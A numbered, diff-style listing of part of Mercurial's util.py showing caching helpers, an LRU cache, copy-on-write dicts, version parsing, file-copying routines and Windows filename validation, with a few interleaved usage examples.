931 937 self.name, len(data), flags, address, res))
932 938
933 939 self._writedata(data)
934 940
935 941 def setblocking(self, res, flag):
936 942 if not self.states:
937 943 return
938 944
939 945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940 946
941 947 def settimeout(self, res, value):
942 948 if not self.states:
943 949 return
944 950
945 951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946 952
947 953 def gettimeout(self, res):
948 954 if not self.states:
949 955 return
950 956
951 957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952 958
953 959 def setsockopt(self, res, level, optname, value):
954 960 if not self.states:
955 961 return
956 962
957 963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 964 self.name, level, optname, value, res))
959 965
960 966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 967 logdata=False, logdataapis=True):
962 968 """Turn a socket into a logging socket."""
963 969
964 970 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 971 states=states, logdata=logdata,
966 972 logdataapis=logdataapis)
967 973 return socketproxy(fh, observer)
968 974
969 975 def version():
970 976 """Return version information if available."""
971 977 try:
972 978 from . import __version__
973 979 return __version__.version
974 980 except ImportError:
975 981 return 'unknown'
976 982
977 983 def versiontuple(v=None, n=4):
978 984 """Parses a Mercurial version string into an N-tuple.
979 985
980 986 The version string to be parsed is specified with the ``v`` argument.
981 987 If it isn't defined, the current Mercurial version string will be parsed.
982 988
983 989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 990 returned values:
985 991
986 992 >>> v = b'3.6.1+190-df9b73d2d444'
987 993 >>> versiontuple(v, 2)
988 994 (3, 6)
989 995 >>> versiontuple(v, 3)
990 996 (3, 6, 1)
991 997 >>> versiontuple(v, 4)
992 998 (3, 6, 1, '190-df9b73d2d444')
993 999
994 1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 1001 (3, 6, 1, '190-df9b73d2d444+20151118')
996 1002
997 1003 >>> v = b'3.6'
998 1004 >>> versiontuple(v, 2)
999 1005 (3, 6)
1000 1006 >>> versiontuple(v, 3)
1001 1007 (3, 6, None)
1002 1008 >>> versiontuple(v, 4)
1003 1009 (3, 6, None, None)
1004 1010
1005 1011 >>> v = b'3.9-rc'
1006 1012 >>> versiontuple(v, 2)
1007 1013 (3, 9)
1008 1014 >>> versiontuple(v, 3)
1009 1015 (3, 9, None)
1010 1016 >>> versiontuple(v, 4)
1011 1017 (3, 9, None, 'rc')
1012 1018
1013 1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 1020 >>> versiontuple(v, 2)
1015 1021 (3, 9)
1016 1022 >>> versiontuple(v, 3)
1017 1023 (3, 9, None)
1018 1024 >>> versiontuple(v, 4)
1019 1025 (3, 9, None, 'rc+2-02a8fea4289b')
1020 1026
1021 1027 >>> versiontuple(b'4.6rc0')
1022 1028 (4, 6, None, 'rc0')
1023 1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 1030 (4, 6, None, 'rc0+12-425d55e54f98')
1025 1031 >>> versiontuple(b'.1.2.3')
1026 1032 (None, None, None, '.1.2.3')
1027 1033 >>> versiontuple(b'12.34..5')
1028 1034 (12, 34, None, '..5')
1029 1035 >>> versiontuple(b'1.2.3.4.5.6')
1030 1036 (1, 2, 3, '.4.5.6')
1031 1037 """
1032 1038 if not v:
1033 1039 v = version()
1034 1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 1041 if not m:
1036 1042 vparts, extra = '', v
1037 1043 elif m.group(2):
1038 1044 vparts, extra = m.groups()
1039 1045 else:
1040 1046 vparts, extra = m.group(1), None
1041 1047
1042 1048 vints = []
1043 1049 for i in vparts.split('.'):
1044 1050 try:
1045 1051 vints.append(int(i))
1046 1052 except ValueError:
1047 1053 break
1048 1054 # (3, 6) -> (3, 6, None)
1049 1055 while len(vints) < 3:
1050 1056 vints.append(None)
1051 1057
1052 1058 if n == 2:
1053 1059 return (vints[0], vints[1])
1054 1060 if n == 3:
1055 1061 return (vints[0], vints[1], vints[2])
1056 1062 if n == 4:
1057 1063 return (vints[0], vints[1], vints[2], extra)
1058 1064
1059 1065 def cachefunc(func):
1060 1066 '''cache the result of function calls'''
1061 1067 # XXX doesn't handle keyword args
1062 1068 if func.__code__.co_argcount == 0:
1063 1069 cache = []
1064 1070 def f():
1065 1071 if len(cache) == 0:
1066 1072 cache.append(func())
1067 1073 return cache[0]
1068 1074 return f
1069 1075 cache = {}
1070 1076 if func.__code__.co_argcount == 1:
1071 1077 # we gain a small amount of time because
1072 1078 # we don't need to pack/unpack the list
1073 1079 def f(arg):
1074 1080 if arg not in cache:
1075 1081 cache[arg] = func(arg)
1076 1082 return cache[arg]
1077 1083 else:
1078 1084 def f(*args):
1079 1085 if args not in cache:
1080 1086 cache[args] = func(*args)
1081 1087 return cache[args]
1082 1088
1083 1089 return f
1084 1090
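For example, memoizing a pure single-argument function (hypothetical):

```python
@cachefunc
def square(x):
    return x * x

square(4)  # computed and cached
square(4)  # returned from the cache; square() is not called again
```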
1085 1091 class cow(object):
1086 1092 """helper class to make copy-on-write easier
1087 1093
1088 1094 Call preparewrite before doing any writes.
1089 1095 """
1090 1096
1091 1097 def preparewrite(self):
1092 1098 """call this before writes, return self or a copied new object"""
1093 1099 if getattr(self, '_copied', 0):
1094 1100 self._copied -= 1
1095 1101 return self.__class__(self)
1096 1102 return self
1097 1103
1098 1104 def copy(self):
1099 1105 """always do a cheap copy"""
1100 1106 self._copied = getattr(self, '_copied', 0) + 1
1101 1107 return self
1102 1108
1103 1109 class sortdict(collections.OrderedDict):
1104 1110 '''a simple sorted dictionary
1105 1111
1106 1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 1113 >>> d2 = d1.copy()
1108 1114 >>> d2
1109 1115 sortdict([('a', 0), ('b', 1)])
1110 1116 >>> d2.update([(b'a', 2)])
1111 1117 >>> list(d2.keys()) # should still be in last-set order
1112 1118 ['b', 'a']
1113 1119 '''
1114 1120
1115 1121 def __setitem__(self, key, value):
1116 1122 if key in self:
1117 1123 del self[key]
1118 1124 super(sortdict, self).__setitem__(key, value)
1119 1125
1120 1126 if pycompat.ispypy:
1121 1127 # __setitem__() isn't called as of PyPy 5.8.0
1122 1128 def update(self, src):
1123 1129 if isinstance(src, dict):
1124 1130 src = src.iteritems()
1125 1131 for k, v in src:
1126 1132 self[k] = v
1127 1133
1128 1134 class cowdict(cow, dict):
1129 1135 """copy-on-write dict
1130 1136
1131 1137 Be sure to call d = d.preparewrite() before writing to d.
1132 1138
1133 1139 >>> a = cowdict()
1134 1140 >>> a is a.preparewrite()
1135 1141 True
1136 1142 >>> b = a.copy()
1137 1143 >>> b is a
1138 1144 True
1139 1145 >>> c = b.copy()
1140 1146 >>> c is a
1141 1147 True
1142 1148 >>> a = a.preparewrite()
1143 1149 >>> b is a
1144 1150 False
1145 1151 >>> a is a.preparewrite()
1146 1152 True
1147 1153 >>> c = c.preparewrite()
1148 1154 >>> b is c
1149 1155 False
1150 1156 >>> b is b.preparewrite()
1151 1157 True
1152 1158 """
1153 1159
1154 1160 class cowsortdict(cow, sortdict):
1155 1161 """copy-on-write sortdict
1156 1162
1157 1163 Be sure to call d = d.preparewrite() before writing to d.
1158 1164 """
1159 1165
1160 1166 class transactional(object):
1161 1167 """Base class for making a transactional type into a context manager."""
1162 1168 __metaclass__ = abc.ABCMeta
1163 1169
1164 1170 @abc.abstractmethod
1165 1171 def close(self):
1166 1172 """Successfully closes the transaction."""
1167 1173
1168 1174 @abc.abstractmethod
1169 1175 def release(self):
1170 1176 """Marks the end of the transaction.
1171 1177
1172 1178 If the transaction has not been closed, it will be aborted.
1173 1179 """
1174 1180
1175 1181 def __enter__(self):
1176 1182 return self
1177 1183
1178 1184 def __exit__(self, exc_type, exc_val, exc_tb):
1179 1185 try:
1180 1186 if exc_type is None:
1181 1187 self.close()
1182 1188 finally:
1183 1189 self.release()
1184 1190
1185 1191 @contextlib.contextmanager
1186 1192 def acceptintervention(tr=None):
1187 1193 """A context manager that closes the transaction on InterventionRequired
1188 1194
1189 1195 If no transaction was provided, this simply runs the body and returns
1190 1196 """
1191 1197 if not tr:
1192 1198 yield
1193 1199 return
1194 1200 try:
1195 1201 yield
1196 1202 tr.close()
1197 1203 except error.InterventionRequired:
1198 1204 tr.close()
1199 1205 raise
1200 1206 finally:
1201 1207 tr.release()
1202 1208
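A sketch of the intended use (tr and dostep are hypothetical): InterventionRequired closes the transaction before propagating, while any other exception leaves it unclosed so release() aborts it.

```python
tr = repo.transaction(b'example')  # hypothetical transaction
with acceptintervention(tr):
    dostep(tr)  # raising InterventionRequired here still commits tr
```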
1203 1209 @contextlib.contextmanager
1204 1210 def nullcontextmanager():
1205 1211 yield
1206 1212
1207 1213 class _lrucachenode(object):
1208 1214 """A node in a doubly linked list.
1209 1215
1210 1216 Holds a reference to nodes on either side as well as a key-value
1211 1217 pair for the dictionary entry.
1212 1218 """
1213 1219 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214 1220
1215 1221 def __init__(self):
1216 1222 self.next = None
1217 1223 self.prev = None
1218 1224
1219 1225 self.key = _notset
1220 1226 self.value = None
1221 1227 self.cost = 0
1222 1228
1223 1229 def markempty(self):
1224 1230 """Mark the node as emptied."""
1225 1231 self.key = _notset
1226 1232 self.value = None
1227 1233 self.cost = 0
1228 1234
1229 1235 class lrucachedict(object):
1230 1236 """Dict that caches most recent accesses and sets.
1231 1237
1232 1238 The dict consists of an actual backing dict - indexed by original
1233 1239 key - and a doubly linked circular list defining the order of entries in
1234 1240 the cache.
1235 1241
1236 1242 The head node is the newest entry in the cache. If the cache is full,
1237 1243 we recycle head.prev and make it the new head. Cache accesses result in
1238 1244 the node being moved to before the existing head and being marked as the
1239 1245 new head node.
1240 1246
1241 1247 Items in the cache can be inserted with an optional "cost" value. This is
1242 1248 simply an integer that is specified by the caller. The cache can be queried
1243 1249 for the total cost of all items presently in the cache.
1244 1250
1245 1251 The cache can also define a maximum cost. If a cache insertion would
1246 1252 cause the total cost of the cache to go beyond the maximum cost limit,
1247 1253 nodes will be evicted to make room for the new node. This can be used
1248 1254 to e.g. set a max memory limit and associate an estimated bytes size
1249 1255 cost to each item in the cache. By default, no maximum cost is enforced.
1250 1256 """
1251 1257 def __init__(self, max, maxcost=0):
1252 1258 self._cache = {}
1253 1259
1254 1260 self._head = head = _lrucachenode()
1255 1261 head.prev = head
1256 1262 head.next = head
1257 1263 self._size = 1
1258 1264 self.capacity = max
1259 1265 self.totalcost = 0
1260 1266 self.maxcost = maxcost
1261 1267
1262 1268 def __len__(self):
1263 1269 return len(self._cache)
1264 1270
1265 1271 def __contains__(self, k):
1266 1272 return k in self._cache
1267 1273
1268 1274 def __iter__(self):
1269 1275 # We don't have to iterate in cache order, but why not.
1270 1276 n = self._head
1271 1277 for i in range(len(self._cache)):
1272 1278 yield n.key
1273 1279 n = n.next
1274 1280
1275 1281 def __getitem__(self, k):
1276 1282 node = self._cache[k]
1277 1283 self._movetohead(node)
1278 1284 return node.value
1279 1285
1280 1286 def insert(self, k, v, cost=0):
1281 1287 """Insert a new item in the cache with optional cost value."""
1282 1288 node = self._cache.get(k)
1283 1289 # Replace existing value and mark as newest.
1284 1290 if node is not None:
1285 1291 self.totalcost -= node.cost
1286 1292 node.value = v
1287 1293 node.cost = cost
1288 1294 self.totalcost += cost
1289 1295 self._movetohead(node)
1290 1296
1291 1297 if self.maxcost:
1292 1298 self._enforcecostlimit()
1293 1299
1294 1300 return
1295 1301
1296 1302 if self._size < self.capacity:
1297 1303 node = self._addcapacity()
1298 1304 else:
1299 1305 # Grab the last/oldest item.
1300 1306 node = self._head.prev
1301 1307
1302 1308 # At capacity. Kill the old entry.
1303 1309 if node.key is not _notset:
1304 1310 self.totalcost -= node.cost
1305 1311 del self._cache[node.key]
1306 1312
1307 1313 node.key = k
1308 1314 node.value = v
1309 1315 node.cost = cost
1310 1316 self.totalcost += cost
1311 1317 self._cache[k] = node
1312 1318 # And mark it as newest entry. No need to adjust order since it
1313 1319 # is already self._head.prev.
1314 1320 self._head = node
1315 1321
1316 1322 if self.maxcost:
1317 1323 self._enforcecostlimit()
1318 1324
1319 1325 def __setitem__(self, k, v):
1320 1326 self.insert(k, v)
1321 1327
1322 1328 def __delitem__(self, k):
1323 1329 self.pop(k)
1324 1330
1325 1331 def pop(self, k, default=_notset):
1326 1332 try:
1327 1333 node = self._cache.pop(k)
1328 1334 except KeyError:
1329 1335 if default is _notset:
1330 1336 raise
1331 1337 return default
1332 1338 value = node.value
1333 1339 self.totalcost -= node.cost
1334 1340 node.markempty()
1335 1341
1336 1342 # Temporarily mark as newest item before re-adjusting head to make
1337 1343 # this node the oldest item.
1338 1344 self._movetohead(node)
1339 1345 self._head = node.next
1340 1346
1341 1347 return value
1342 1348
1343 1349 # Additional dict methods.
1344 1350
1345 1351 def get(self, k, default=None):
1346 1352 try:
1347 1353 return self.__getitem__(k)
1348 1354 except KeyError:
1349 1355 return default
1350 1356
1351 1357 def peek(self, k, default=_notset):
1352 1358 """Get the specified item without moving it to the head
1353 1359
1354 1360 Unlike get(), this doesn't mutate the internal state. But be aware
1355 1361 that this does not make peek() thread safe.
1356 1362 """
1357 1363 try:
1358 1364 node = self._cache[k]
1359 1365 return node.value
1360 1366 except KeyError:
1361 1367 if default is _notset:
1362 1368 raise
1363 1369 return default
1364 1370
1365 1371 def clear(self):
1366 1372 n = self._head
1367 1373 while n.key is not _notset:
1368 1374 self.totalcost -= n.cost
1369 1375 n.markempty()
1370 1376 n = n.next
1371 1377
1372 1378 self._cache.clear()
1373 1379
1374 1380 def copy(self, capacity=None, maxcost=0):
1375 1381 """Create a new cache as a copy of the current one.
1376 1382
1377 1383 By default, the new cache has the same capacity as the existing one.
1378 1384 But, the cache capacity can be changed as part of performing the
1379 1385 copy.
1380 1386
1381 1387 Items in the copy have an insertion/access order matching this
1382 1388 instance.
1383 1389 """
1384 1390
1385 1391 capacity = capacity or self.capacity
1386 1392 maxcost = maxcost or self.maxcost
1387 1393 result = lrucachedict(capacity, maxcost=maxcost)
1388 1394
1389 1395 # We copy entries by iterating in oldest-to-newest order so the copy
1390 1396 # has the correct ordering.
1391 1397
1392 1398 # Find the first non-empty entry.
1393 1399 n = self._head.prev
1394 1400 while n.key is _notset and n is not self._head:
1395 1401 n = n.prev
1396 1402
1397 1403 # We could potentially skip the first N items when decreasing capacity.
1398 1404 # But let's keep it simple unless it is a performance problem.
1399 1405 for i in range(len(self._cache)):
1400 1406 result.insert(n.key, n.value, cost=n.cost)
1401 1407 n = n.prev
1402 1408
1403 1409 return result
1404 1410
1405 1411 def popoldest(self):
1406 1412 """Remove the oldest item from the cache.
1407 1413
1408 1414 Returns the (key, value) describing the removed cache entry.
1409 1415 """
1410 1416 if not self._cache:
1411 1417 return
1412 1418
1413 1419 # Walk the linked list backwards starting at tail node until we hit
1414 1420 # a non-empty node.
1415 1421 n = self._head.prev
1416 1422 while n.key is _notset:
1417 1423 n = n.prev
1418 1424
1419 1425 key, value = n.key, n.value
1420 1426
1421 1427 # And remove it from the cache and mark it as empty.
1422 1428 del self._cache[n.key]
1423 1429 self.totalcost -= n.cost
1424 1430 n.markempty()
1425 1431
1426 1432 return key, value
1427 1433
1428 1434 def _movetohead(self, node):
1429 1435 """Mark a node as the newest, making it the new head.
1430 1436
1431 1437 When a node is accessed, it becomes the freshest entry in the LRU
1432 1438 list, which is denoted by self._head.
1433 1439
1434 1440 Visually, let's make ``N`` the new head node (* denotes head):
1435 1441
1436 1442 previous/oldest <-> head <-> next/next newest
1437 1443
1438 1444 ----<->--- A* ---<->-----
1439 1445 | |
1440 1446 E <-> D <-> N <-> C <-> B
1441 1447
1442 1448 To:
1443 1449
1444 1450 ----<->--- N* ---<->-----
1445 1451 | |
1446 1452 E <-> D <-> C <-> B <-> A
1447 1453
1448 1454 This requires the following moves:
1449 1455
1450 1456 C.next = D (node.prev.next = node.next)
1451 1457 D.prev = C (node.next.prev = node.prev)
1452 1458 E.next = N (head.prev.next = node)
1453 1459 N.prev = E (node.prev = head.prev)
1454 1460 N.next = A (node.next = head)
1455 1461 A.prev = N (head.prev = node)
1456 1462 """
1457 1463 head = self._head
1458 1464 # C.next = D
1459 1465 node.prev.next = node.next
1460 1466 # D.prev = C
1461 1467 node.next.prev = node.prev
1462 1468 # N.prev = E
1463 1469 node.prev = head.prev
1464 1470 # N.next = A
1465 1471 # It is tempting to do just "head" here, however if node is
1466 1472 # adjacent to head, this will do bad things.
1467 1473 node.next = head.prev.next
1468 1474 # E.next = N
1469 1475 node.next.prev = node
1470 1476 # A.prev = N
1471 1477 node.prev.next = node
1472 1478
1473 1479 self._head = node
1474 1480
1475 1481 def _addcapacity(self):
1476 1482 """Add a node to the circular linked list.
1477 1483
1478 1484 The new node is inserted before the head node.
1479 1485 """
1480 1486 head = self._head
1481 1487 node = _lrucachenode()
1482 1488 head.prev.next = node
1483 1489 node.prev = head.prev
1484 1490 node.next = head
1485 1491 head.prev = node
1486 1492 self._size += 1
1487 1493 return node
1488 1494
1489 1495 def _enforcecostlimit(self):
1490 1496 # This should run after an insertion. It should only be called if total
1491 1497 # cost limits are being enforced.
1492 1498 # The most recently inserted node is never evicted.
1493 1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1494 1500 return
1495 1501
1496 1502 # This is logically equivalent to calling popoldest() until we
1497 1503 # free up enough cost. We don't do that since popoldest() needs
1498 1504 # to walk the linked list and doing this in a loop would be
1499 1505 # quadratic. So we find the first non-empty node and then
1500 1506 # walk nodes until we free up enough capacity.
1501 1507 #
1502 1508 # If we only removed the minimum number of nodes to free enough
1503 1509 # cost at insert time, chances are high that the next insert would
1504 1510 # also require pruning. This would effectively constitute quadratic
1505 1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1506 1512 # target cost that is a percentage of the max cost. This will tend
1507 1513 # to free more nodes when the high water mark is reached, which
1508 1514 # lowers the chances of needing to prune on the subsequent insert.
1509 1515 targetcost = int(self.maxcost * 0.75)
1510 1516
1511 1517 n = self._head.prev
1512 1518 while n.key is _notset:
1513 1519 n = n.prev
1514 1520
1515 1521 while len(self) > 1 and self.totalcost > targetcost:
1516 1522 del self._cache[n.key]
1517 1523 self.totalcost -= n.cost
1518 1524 n.markempty()
1519 1525 n = n.prev
1520 1526
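A short sketch of the cost accounting described in the lrucachedict docstring: once maxcost is exceeded, old nodes are evicted down toward the 75% target.

```python
d = lrucachedict(4, maxcost=100)
d.insert(b'a', b'value', cost=60)
d.insert(b'b', b'value', cost=60)  # total cost 120 > 100: b'a' is evicted
assert b'a' not in d
assert d.totalcost == 60
```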
1521 1527 def lrucachefunc(func):
1522 1528 '''cache most recent results of function calls'''
1523 1529 cache = {}
1524 1530 order = collections.deque()
1525 1531 if func.__code__.co_argcount == 1:
1526 1532 def f(arg):
1527 1533 if arg not in cache:
1528 1534 if len(cache) > 20:
1529 1535 del cache[order.popleft()]
1530 1536 cache[arg] = func(arg)
1531 1537 else:
1532 1538 order.remove(arg)
1533 1539 order.append(arg)
1534 1540 return cache[arg]
1535 1541 else:
1536 1542 def f(*args):
1537 1543 if args not in cache:
1538 1544 if len(cache) > 20:
1539 1545 del cache[order.popleft()]
1540 1546 cache[args] = func(*args)
1541 1547 else:
1542 1548 order.remove(args)
1543 1549 order.append(args)
1544 1550 return cache[args]
1545 1551
1546 1552 return f
1547 1553
1548 1554 class propertycache(object):
1549 1555 def __init__(self, func):
1550 1556 self.func = func
1551 1557 self.name = func.__name__
1552 1558 def __get__(self, obj, type=None):
1553 1559 result = self.func(obj)
1554 1560 self.cachevalue(obj, result)
1555 1561 return result
1556 1562
1557 1563 def cachevalue(self, obj, value):
1558 1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1559 1565 obj.__dict__[self.name] = value
1560 1566
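Illustrative use of propertycache on a hypothetical class: the function body runs once per instance, after which the cached attribute shadows the descriptor.

```python
class repoinfo(object):  # hypothetical example class
    @propertycache
    def expensive(self):
        print('computed')
        return 42

r = repoinfo()
r.expensive  # prints 'computed', caches 42 in r.__dict__
r.expensive  # served from r.__dict__; no recomputation
```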
1561 1567 def clearcachedproperty(obj, prop):
1562 1568 '''clear a cached property value, if one has been set'''
1563 1569 prop = pycompat.sysstr(prop)
1564 1570 if prop in obj.__dict__:
1565 1571 del obj.__dict__[prop]
1566 1572
1567 1573 def increasingchunks(source, min=1024, max=65536):
1568 1574 '''return no less than min bytes per chunk while data remains,
1569 1575 doubling min after each chunk until it reaches max'''
1570 1576 def log2(x):
1571 1577 if not x:
1572 1578 return 0
1573 1579 i = 0
1574 1580 while x:
1575 1581 x >>= 1
1576 1582 i += 1
1577 1583 return i - 1
1578 1584
1579 1585 buf = []
1580 1586 blen = 0
1581 1587 for chunk in source:
1582 1588 buf.append(chunk)
1583 1589 blen += len(chunk)
1584 1590 if blen >= min:
1585 1591 if min < max:
1586 1592 min = min << 1
1587 1593 nmin = 1 << log2(blen)
1588 1594 if nmin > min:
1589 1595 min = nmin
1590 1596 if min > max:
1591 1597 min = max
1592 1598 yield ''.join(buf)
1593 1599 blen = 0
1594 1600 buf = []
1595 1601 if buf:
1596 1602 yield ''.join(buf)
1597 1603
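For instance, regrouping a stream of tiny chunks into progressively larger ones:

```python
chunks = (b'x' * 100 for _ in range(100))  # 10,000 bytes in 100-byte pieces
sizes = [len(c) for c in increasingchunks(chunks, min=1024, max=4096)]
# yields roughly 1024-, 2048- and 4096-byte chunks, then the remainder
```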
1598 1604 def always(fn):
1599 1605 return True
1600 1606
1601 1607 def never(fn):
1602 1608 return False
1603 1609
1604 1610 def nogc(func):
1605 1611 """disable garbage collector
1606 1612
1607 1613 Python's garbage collector triggers a GC each time a certain number of
1608 1614 container objects (the number being defined by gc.get_threshold()) are
1609 1615 allocated even when marked not to be tracked by the collector. Tracking has
1610 1616 no effect on when GCs are triggered, only on what objects the GC looks
1611 1617 into. As a workaround, disable GC while building complex (huge)
1612 1618 containers.
1613 1619
1614 1620 This garbage collector issue has been fixed in 2.7, but it still affects
1615 1621 CPython's performance.
1616 1622 """
1617 1623 def wrapper(*args, **kwargs):
1618 1624 gcenabled = gc.isenabled()
1619 1625 gc.disable()
1620 1626 try:
1621 1627 return func(*args, **kwargs)
1622 1628 finally:
1623 1629 if gcenabled:
1624 1630 gc.enable()
1625 1631 return wrapper
1626 1632
1627 1633 if pycompat.ispypy:
1628 1634 # PyPy runs slower with gc disabled
1629 1635 nogc = lambda x: x
1630 1636
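Typical use is as a decorator around container-heavy construction (hypothetical function):

```python
@nogc
def buildindex(entries):
    # the collector stays disabled while this large dict is populated
    return {e: True for e in entries}
```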
1631 1637 def pathto(root, n1, n2):
1632 1638 '''return the relative path from one place to another.
1633 1639 root should use os.sep to separate directories
1634 1640 n1 should use os.sep to separate directories
1635 1641 n2 should use "/" to separate directories
1636 1642 returns an os.sep-separated path.
1637 1643
1638 1644 If n1 is a relative path, it's assumed it's
1639 1645 relative to root.
1640 1646 n2 should always be relative to root.
1641 1647 '''
1642 1648 if not n1:
1643 1649 return localpath(n2)
1644 1650 if os.path.isabs(n1):
1645 1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1646 1652 return os.path.join(root, localpath(n2))
1647 1653 n2 = '/'.join((pconvert(root), n2))
1648 1654 a, b = splitpath(n1), n2.split('/')
1649 1655 a.reverse()
1650 1656 b.reverse()
1651 1657 while a and b and a[-1] == b[-1]:
1652 1658 a.pop()
1653 1659 b.pop()
1654 1660 b.reverse()
1655 1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1656 1662
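For example, on a POSIX system, going from /repo/a/b to /repo/c/d:

```python
pathto(b'/repo', b'/repo/a/b', b'c/d')  # -> b'../../c/d'
```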
1657 1663 # the location of data files matching the source code
1658 1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1659 1665 # executable version (py2exe) doesn't support __file__
1660 1666 datapath = os.path.dirname(pycompat.sysexecutable)
1661 1667 else:
1662 1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1663 1669
1664 1670 i18n.setdatapath(datapath)
1665 1671
1666 1672 def checksignature(func):
1667 1673 '''wrap a function with code to check for calling errors'''
1668 1674 def check(*args, **kwargs):
1669 1675 try:
1670 1676 return func(*args, **kwargs)
1671 1677 except TypeError:
1672 1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1673 1679 raise error.SignatureError
1674 1680 raise
1675 1681
1676 1682 return check
1677 1683
1678 1684 # a whitelist of known filesystems where hardlinks work reliably
1679 1685 _hardlinkfswhitelist = {
1680 1686 'apfs',
1681 1687 'btrfs',
1682 1688 'ext2',
1683 1689 'ext3',
1684 1690 'ext4',
1685 1691 'hfs',
1686 1692 'jfs',
1687 1693 'NTFS',
1688 1694 'reiserfs',
1689 1695 'tmpfs',
1690 1696 'ufs',
1691 1697 'xfs',
1692 1698 'zfs',
1693 1699 }
1694 1700
1695 1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1696 1702 '''copy a file, preserving mode and optionally other stat info like
1697 1703 atime/mtime
1698 1704
1699 1705 checkambig argument is used with filestat, and is useful only if
1700 1706 destination file is guarded by any lock (e.g. repo.lock or
1701 1707 repo.wlock).
1702 1708
1703 1709 copystat and checkambig should be exclusive.
1704 1710 '''
1705 1711 assert not (copystat and checkambig)
1706 1712 oldstat = None
1707 1713 if os.path.lexists(dest):
1708 1714 if checkambig:
1709 1715 oldstat = checkambig and filestat.frompath(dest)
1710 1716 unlink(dest)
1711 1717 if hardlink:
1712 1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1713 1719 # unless we are confident that dest is on a whitelisted filesystem.
1714 1720 try:
1715 1721 fstype = getfstype(os.path.dirname(dest))
1716 1722 except OSError:
1717 1723 fstype = None
1718 1724 if fstype not in _hardlinkfswhitelist:
1719 1725 hardlink = False
1720 1726 if hardlink:
1721 1727 try:
1722 1728 oslink(src, dest)
1723 1729 return
1724 1730 except (IOError, OSError):
1725 1731 pass # fall back to normal copy
1726 1732 if os.path.islink(src):
1727 1733 os.symlink(os.readlink(src), dest)
1728 1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1729 1735 # for them anyway
1730 1736 else:
1731 1737 try:
1732 1738 shutil.copyfile(src, dest)
1733 1739 if copystat:
1734 1740 # copystat also copies mode
1735 1741 shutil.copystat(src, dest)
1736 1742 else:
1737 1743 shutil.copymode(src, dest)
1738 1744 if oldstat and oldstat.stat:
1739 1745 newstat = filestat.frompath(dest)
1740 1746 if newstat.isambig(oldstat):
1741 1747 # stat of copied file is ambiguous to original one
1742 1748 advanced = (
1743 1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1744 1750 os.utime(dest, (advanced, advanced))
1745 1751 except shutil.Error as inst:
1746 1752 raise error.Abort(str(inst))
1747 1753
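# Illustrative sketch: a caller that prefers hardlinks but tolerates the
# silent fallback to a real copy (the paths here are hypothetical):
#
#   copyfile(b'.hg/store/data/foo.i', b'backup/foo.i', hardlink=True)
#
# If 'backup' lives on a filesystem outside _hardlinkfswhitelist, or the
# link attempt fails, a normal copy with copied mode bits is made instead.
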
1748 1754 def copyfiles(src, dst, hardlink=None, progress=None):
1749 1755 """Copy a directory tree using hardlinks if possible."""
1750 1756 num = 0
1751 1757
1752 1758 def settopic():
1753 1759 if progress:
1754 1760 progress.topic = _('linking') if hardlink else _('copying')
1755 1761
1756 1762 if os.path.isdir(src):
1757 1763 if hardlink is None:
1758 1764 hardlink = (os.stat(src).st_dev ==
1759 1765 os.stat(os.path.dirname(dst)).st_dev)
1760 1766 settopic()
1761 1767 os.mkdir(dst)
1762 1768 for name, kind in listdir(src):
1763 1769 srcname = os.path.join(src, name)
1764 1770 dstname = os.path.join(dst, name)
1765 1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1766 1772 num += n
1767 1773 else:
1768 1774 if hardlink is None:
1769 1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1770 1776 os.stat(os.path.dirname(dst)).st_dev)
1771 1777 settopic()
1772 1778
1773 1779 if hardlink:
1774 1780 try:
1775 1781 oslink(src, dst)
1776 1782 except (IOError, OSError):
1777 1783 hardlink = False
1778 1784 shutil.copy(src, dst)
1779 1785 else:
1780 1786 shutil.copy(src, dst)
1781 1787 num += 1
1782 1788 if progress:
1783 1789 progress.increment()
1784 1790
1785 1791 return hardlink, num
1786 1792
1787 1793 _winreservednames = {
1788 1794 'con', 'prn', 'aux', 'nul',
1789 1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1790 1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1791 1797 }
1792 1798 _winreservedchars = ':*?"<>|'
1793 1799 def checkwinfilename(path):
1794 1800 r'''Check that the base-relative path is a valid filename on Windows.
1795 1801 Returns None if the path is ok, or a UI string describing the problem.
1796 1802
1797 1803 >>> checkwinfilename(b"just/a/normal/path")
1798 1804 >>> checkwinfilename(b"foo/bar/con.xml")
1799 1805 "filename contains 'con', which is reserved on Windows"
1800 1806 >>> checkwinfilename(b"foo/con.xml/bar")
1801 1807 "filename contains 'con', which is reserved on Windows"
1802 1808 >>> checkwinfilename(b"foo/bar/xml.con")
1803 1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1804 1810 "filename contains 'AUX', which is reserved on Windows"
1805 1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1806 1812 "filename contains ':', which is reserved on Windows"
1807 1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1808 1814 "filename contains '\\x07', which is invalid on Windows"
